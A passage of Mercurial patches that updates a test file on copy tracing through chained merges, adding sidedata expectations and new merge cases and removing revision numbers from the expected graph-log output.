copy overwrite, no content change - the other way mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way mJ,EAm: chained merges (conflict -> simple) - same content everywhere mK,AEm: chained merges (conflict -> simple) - same content everywhere mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + mN,GFm: chained merges (copy-overwrite -> simple) - same content + mO,FGm: chained merges (copy-overwrite -> simple) - same content + n-1: unrelated changes (based on the "f" series of changes) + o-1: unrelated changes (based on "g" changes) Test that sidedata computations during upgrades are correct @@ -1212,6 +1311,32 @@ 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' + ##### revision 48 ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-n' + added : unrelated-n, ; + ##### revision 49 ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-o' + added : unrelated-o, ; + ##### revision 50 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 51 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 52 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 53 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' #endif @@ -2168,3 +2293,52 @@ A unrelated-l R a +Subcase: chaining "merged" information during a merge +`````````````````````````````````````````````````````` + +When a non-rename change are merged with a copy overwrite, the merge pick the copy source from (p1) as the reference. We should preserve this information in subsequent merges. + + +reference output: + + (for details about the filelog pick, check the mFGm/mGFm case) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFGm")' d + A d + a (filelog !) + h (sidedata !) + h (upgraded !) + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm")' d + A d + a (filelog !) + a (sidedata !) + a (upgraded !) + +Chained output + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mO,FGm")' d + A d + a (filelog !) + h (sidedata !) + h (upgraded !) + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFG,Om")' d + A d + a (filelog !) + h (sidedata !) + h (upgraded !) + + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGF,Nm")' d + A d + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + h (known-bad-output sidedata !) + h (known-bad-output upgraded !) + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mN,GFm")' d + A d + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + h (known-bad-output sidedata !) + h (known-bad-output upgraded !) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613592525 -3600 # Wed Feb 17 21:08:45 2021 +0100 # Node ID 74e2256a56b8a57f3aa556d0601b0e47dd41570d # Parent 075b2499e3d65e4526bc13e2e0403a981e6c0b11 test-copies: remove revision number from log Differential Revision: https://phab.mercurial-scm.org/D10048 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -18,7 +18,7 @@ > [diff] > git=yes > [command-templates] - > log={rev} {desc}\n + > log={desc}\n > EOF #if compatibility @@ -71,11 +71,11 @@ $ hg mv c d $ hg ci -Am 'i-2: c -move-> d' $ hg log -G - @ 2 i-2: c -move-> d + @ i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h And having another branch with renames on the other side @@ -85,15 +85,15 @@ $ hg mv e f $ hg ci -Am 'a-2: e -move-> f' $ hg log -G --rev '::.' - @ 4 a-2: e -move-> f + @ a-2: e -move-> f | - o 3 a-1: d -move-> e + o a-1: d -move-> e | - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Have a branching with nothing on one side @@ -104,13 +104,13 @@ $ hg ci -m 'b-1: b update' created new head $ hg log -G --rev '::.' - @ 5 b-1: b update + @ b-1: b update | - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Create a branch that delete a file previous renamed @@ -121,13 +121,13 @@ $ hg ci -m 'c-1 delete d' created new head $ hg log -G --rev '::.' - @ 6 c-1 delete d + @ c-1 delete d | - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Create a branch that delete a file previous renamed and recreate it @@ -141,15 +141,15 @@ $ hg add d $ hg ci -m 'd-2 re-add d' $ hg log -G --rev '::.' - @ 8 d-2 re-add d + @ d-2 re-add d | - o 7 d-1 delete d + o d-1 delete d | - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Having another branch renaming a different file to the same filename as another @@ -162,15 +162,15 @@ $ hg mv g f $ hg ci -m 'e-2 g -move-> f' $ hg log -G --rev '::.' - @ 10 e-2 g -move-> f + @ e-2 g -move-> f | - o 9 e-1 b -move-> g + o e-1 b -move-> g | - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Setup all merge @@ -201,21 +201,21 @@ $ hg ci -m "mABm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mABm")+desc("mBAm"))' - @ 12 mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way + @ mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way |\ - +---o 11 mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way + +---o mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way | |/ - | o 5 b-1: b update + | o b-1: b update | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h @@ -249,23 +249,23 @@ $ hg add d $ hg ci -m 'mCBm-1 re-add d' $ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))' - @ 16 mCBm-1 re-add d + @ mCBm-1 re-add d | - o 15 mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way + o mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way |\ - | | o 14 mBCm-1 re-add d + | | o mBCm-1 re-add d | | | - +---o 13 mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way + +---o mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Comparing with a merge re-adding the file afterward @@ -291,21 +291,21 @@ $ hg ci -m "mDBm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))' - @ 18 mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way + @ mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way |\ - +---o 17 mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way + +---o mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way | |/ - | o 8 d-2 re-add d + | o d-2 re-add d | | - | o 7 d-1 delete d + | o d-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h @@ -337,23 +337,23 @@ $ hg ci -m "mEAm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' - @ 20 mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + @ mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way |\ - +---o 19 mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way | |/ - | o 10 e-2 g -move-> f + | o e-2 g -move-> f | | - | o 9 e-1 b -move-> g + | o e-1 b -move-> g | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Subcase: existing copy information overwritten on one branch @@ -394,21 +394,21 @@ $ hg ci -m "mFBm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' - @ 24 mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + @ mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way |\ - +---o 23 mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + +---o mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way | |/ - | o 22 f-2: rename i -> d + | o f-2: rename i -> d | | - | o 21 f-1: rename h -> i + | o f-1: rename h -> i | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h @@ -446,21 +446,21 @@ $ hg ci -m "mGDm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))' - @ 27 mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way + @ mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way |\ - +---o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + +---o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d | | - o | 7 d-1 delete d + o | d-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Subcase: merging a change to a file with a "copy overwrite" to that file from another branch @@ -501,21 +501,21 @@ $ hg ci -m "mGFm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))' - @ 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way + @ mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - +---o 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way + +---o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h @@ -561,19 +561,19 @@ created new head $ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))' - @ 31 mGCm-0 merge updated/deleted - revive the file (updated content) - the other way + @ mGCm-0 merge updated/deleted - revive the file (updated content) - the other way |\ - +---o 30 mCGm-0 merge updated/deleted - revive the file (updated content) - one way + +---o mCGm-0 merge updated/deleted - revive the file (updated content) - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 6 c-1 delete d + o | c-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h @@ -610,19 +610,19 @@ created new head $ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))' - @ 33 mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + @ mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way |\ - +---o 32 mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + +---o mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h @@ -659,19 +659,19 @@ $ hg ci -m "mHC-delete-before-conflict-m-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))' - @ 36 mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way + @ mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way |\ - +---o 35 mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way + +---o mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way | |/ - | o 34 h-1: b -(move)-> d + | o h-1: b -(move)-> d | | - o | 6 c-1 delete d + o | c-1 delete d | | - o | 2 i-2: c -move-> d + o | i-2: c -move-> d | | - o | 1 i-1: a -move-> c + o | i-1: a -move-> c |/ - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Decision from previous merge are properly chained with later merge @@ -750,35 +750,35 @@ $ hg log -G --rev '::(desc("mAE,Km") + desc("mK,AEm") + desc("mEA,Jm") + desc("mJ,EAm"))' - @ 42 mJ,EAm: chained merges (conflict -> simple) - same content everywhere + @ mJ,EAm: chained merges (conflict -> simple) - same content everywhere |\ - +---o 41 mEA,Jm: chained merges (conflict -> simple) - same content everywhere + +---o mEA,Jm: chained merges (conflict -> simple) - same content everywhere | |/ - | | o 40 mK,AEm: chained merges (conflict -> simple) - same content everywhere + | | o mK,AEm: chained merges (conflict -> simple) - same content everywhere | | |\ - | | +---o 39 mAE,Km: chained merges (conflict -> simple) - same content everywhere + | | +---o mAE,Km: chained merges (conflict -> simple) - same content everywhere | | | |/ - | | | o 38 k-1: unrelated changes (based on "e" changes) + | | | o k-1: unrelated changes (based on "e" changes) | | | | - | o | | 37 j-1: unrelated changes (based on the "a" series of changes) + | o | | j-1: unrelated changes (based on the "a" series of changes) | | | | - o-----+ 20 mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + o-----+ mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way |/ / / - | o / 19 mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + | o / mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way |/|/ - | o 10 e-2 g -move-> f + | o e-2 g -move-> f | | - | o 9 e-1 b -move-> g + | o e-1 b -move-> g | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Subcase: chaining salvage information during a merge @@ -839,29 +839,29 @@ created new head $ hg log -G --rev '::(desc("mBC+revert,Lm") + desc("mCB+revert,Lm") + desc("mL,BC+revertm") + desc("mL,CB+revertm"))' - @ 47 mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + @ mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) |\ - | | o 46 mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + | | o mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) | |/| - +-+---o 45 mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + +-+---o mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) | | | - | +---o 44 mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + | +---o mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) | | |/ - | o | 43 l-1: unrelated changes (based on "c" changes) + | o | l-1: unrelated changes (based on "c" changes) | | | - | | o 33 mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + | | o mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way | |/| - o---+ 32 mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + o---+ mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way |/ / - o | 6 c-1 delete d + o | c-1 delete d | | - | o 5 b-1: b update + | o b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h @@ -931,33 +931,33 @@ created new head $ hg log -G --rev '::(desc("mFG,Om") + desc("mO,FGm") + desc("mGF,Nm") + desc("mN,GFm"))' - @ 53 mN,GFm: chained merges (copy-overwrite -> simple) - same content + @ mN,GFm: chained merges (copy-overwrite -> simple) - same content |\ - +---o 52 mGF,Nm: chained merges (copy-overwrite -> simple) - same content + +---o mGF,Nm: chained merges (copy-overwrite -> simple) - same content | |/ - | | o 51 mO,FGm: chained merges (copy-overwrite -> simple) - same content + | | o mO,FGm: chained merges (copy-overwrite -> simple) - same content | | |\ - | | +---o 50 mFG,Om: chained merges (copy-overwrite -> simple) - same content + | | +---o mFG,Om: chained merges (copy-overwrite -> simple) - same content | | | |/ - | | | o 49 o-1: unrelated changes (based on "g" changes) + | | | o o-1: unrelated changes (based on "g" changes) | | | | - | o | | 48 n-1: unrelated changes (based on the "f" series of changes) + | o | | n-1: unrelated changes (based on the "f" series of changes) | | | | - o-----+ 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way + o-----+ mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |/ / / - | o / 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way + | o / mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way |/|/ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Summary of all created cases @@ -1364,21 +1364,21 @@ - unrelated change on the other side $ hg log -G --rev '::(desc("mABm")+desc("mBAm"))' - o 12 mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way + o mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way |\ - +---o 11 mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way + +---o mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way | |/ - | o 5 b-1: b update + | o b-1: b update | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mABm")' @@ -1423,23 +1423,23 @@ and recreate an unrelated file after the merge $ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))' - o 16 mCBm-1 re-add d + o mCBm-1 re-add d | - o 15 mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way + o mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way |\ - | | o 14 mBCm-1 re-add d + | | o mBCm-1 re-add d | | | - +---o 13 mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way + +---o mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h - comparing from the merge @@ -1499,21 +1499,21 @@ - one deleting and recreating the change $ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))' - o 18 mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way + o mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way |\ - +---o 17 mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way + +---o mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way | |/ - | o 8 d-2 re-add d + | o d-2 re-add d | | - | o 7 d-1 delete d + | o d-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBDm-0")' M d @@ -1553,12 +1553,12 @@ Log output should not include a merge commit as it did not happen $ hg log -Gfr 'desc("mBDm-0")' d - o 8 d-2 re-add d + o d-2 re-add d | ~ $ hg log -Gfr 'desc("mDBm-0")' d - o 8 d-2 re-add d + o d-2 re-add d | ~ @@ -1582,23 +1582,23 @@ - the "a-" branch renaming d to f (through e) $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' - o 20 mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + o mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way |\ - +---o 19 mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way | |/ - | o 10 e-2 g -move-> f + | o e-2 g -move-> f | | - | o 9 e-1 b -move-> g + | o e-1 b -move-> g | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h #if no-changeset $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' @@ -1705,21 +1705,21 @@ - one overwriting a file (d) with a rename (from h to i to d) $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' - o 24 mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + o mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way |\ - +---o 23 mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + +---o mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way | |/ - | o 22 f-2: rename i -> d + | o f-2: rename i -> d | | - | o 21 f-1: rename h -> i + | o f-1: rename h -> i | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBFm-0")' M b @@ -1758,32 +1758,32 @@ #if no-changeset $ hg log -Gfr 'desc("mBFm-0")' d - o 22 f-2: rename i -> d + o f-2: rename i -> d | - o 21 f-1: rename h -> i + o f-1: rename h -> i : - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mBFm-0")' d - o 2 i-2: c -move-> d + o i-2: c -move-> d | ~ #endif #if no-changeset $ hg log -Gfr 'desc("mFBm-0")' d - o 22 f-2: rename i -> d + o f-2: rename i -> d | - o 21 f-1: rename h -> i + o f-1: rename h -> i : - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mFBm-0")' d - o 2 i-2: c -move-> d + o i-2: c -move-> d | ~ #endif @@ -1799,21 +1799,21 @@ consider history and rename on both branch of the merge. $ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))' - o 27 mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way + o mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way |\ - +---o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + +---o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d | | - o | 7 d-1 delete d + o | d-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h One side of the merge have a long history with rename. The other side of the merge point to a new file with a smaller history. Each side is "valid". @@ -1840,28 +1840,28 @@ #if no-changeset $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | ~ #endif @@ -1869,28 +1869,28 @@ #if no-changeset $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | ~ #endif @@ -1907,21 +1907,21 @@ $ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))' - o 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way + o mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - +---o 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way + +---o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Note: @@ -1985,52 +1985,52 @@ #if no-changeset $ hg log -Gfr 'desc("mFGm-0")' d - o 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way + o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mFGm-0")' d - o 25 g-1: update d + o g-1: update d | - o 2 i-2: c -move-> d + o i-2: c -move-> d | ~ #endif #if no-changeset $ hg log 